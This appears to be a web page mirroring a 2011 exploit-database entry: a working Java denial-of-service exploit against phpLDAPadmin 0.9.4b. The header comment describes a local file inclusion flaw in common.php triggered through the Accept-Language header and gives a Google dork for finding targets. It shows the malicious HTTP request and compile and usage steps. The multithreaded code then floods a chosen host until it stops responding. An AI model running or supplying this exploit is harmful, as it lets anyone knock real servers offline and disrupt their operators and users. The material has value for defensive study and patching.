扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 |
/** * Exploit Title: phpLDAPadmin 0.9.4b DoS * Google Dork: "phpLDAPadmin - 0.9.4b" * Date: 2011-10-23 * Author: Alguien * Software Link: http://sourceforge.net/projects/phpldapadmin/files/phpldapadmin/0.9.4b/ * Version: 0.9.4b * Tested on: Red Hat * CVE : - * * Compilation: * ------------ * $ javac phpldos.java * * Usage: * ------ * $ java phpldos <host> <path> <threads> * * Example: * -------- * $ java phpldos www.example.com /phpldapadmin/ 10 * * Explanation: * ------------ * The file "common.php" is vulnerable to LFI through the "Accept-Language" * HTTP header. * * if( isset( $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) ) { * // get the languages which are spetcified in the HTTP header * $HTTP_LANGS1 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] ); * $HTTP_LANGS2 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] ); * foreach( $HTTP_LANGS2 as $key => $value ) { * $value=preg_split ("/[-]+/", $value ); * $HTTP_LANGS2[$key]=$value[0]; * } * * $HTTP_LANGS = array_merge ($HTTP_LANGS1, $HTTP_LANGS2); * foreach( $HTTP_LANGS as $HTTP_LANG) { * // try to grab one after the other the language file * if( file_exists( realpath( "lang/recoded/$HTTP_LANG.php" ) ) && * is_readable( realpath( "lang/recoded/$HTTP_LANG.php" ) ) ) { * ob_start(); * include realpath( "lang/recoded/$HTTP_LANG.php" ); * ob_end_clean(); * break; * } * } * } * * This exploit sends "../../common" in the Accept-Language header in order to * generate a recursive inclusions and cause a denial of service via resource * exhaustion. * * GET /phpldapadmin/common.php HTTP/1.1\r\n * Host: www.example.com\r\n * Accept-Language: ../../common\r\n * Connection: close\r\n * \r\n * */ import java.io.PrintStream; import java.net.InetSocketAddress; import java.net.Socket; class phpldos implements Runnable { public static final int HTTP_PORT = 80; public static final int TIMEOUT = 10000; private static String host; private static String path; private Socket sk; private PrintStream ps; public void run() { while (true) { if (!open_connection()) { System.out.println("[+] Mission complete. Server is down };]"); break; } send_attack(); try { ps.close(); sk.close(); } catch (Exception e) { // D'oh! } } } private boolean open_connection() { try { sk = new Socket(); sk.connect(new InetSocketAddress(host, HTTP_PORT), TIMEOUT); ps = new PrintStream(sk.getOutputStream()); } catch (Exception e) { return false; } return true; } private void send_attack() { try { String message = "" + "GET " + path + "common.php HTTP/1.1\r\n" + "Host: " + host + "\r\n" + "Accept-Language: ../../common\r\n" + "Connection: close\r\n" + "\r\n"; ps.print(message); } catch (Exception e) { // D'oh! } } public static void main(String[] args) { if (args.length != 3) { usage(); } host = args[0]; path = args[1]; int threads = Integer.parseInt(args[2]); System.out.println("[+] Attacking with " + threads + " threads."); for (int i = 0; i < threads; i++) { new Thread(new phpldos()).start(); } } public static void usage() { System.out.print( "###########################################################\n" + "#phpLDAPadmin DoS #\n" + "#by: Alguien - http://alguienenlafisi.blogspot.com#\n" + "###########################################################\n" + "Syntax: java phpldos <host> <path> <threads>\n" + "Example : java phpldos www.example.com /phpldapadmin/ 10\n\n"); System.exit(1); } } |
体验盒子
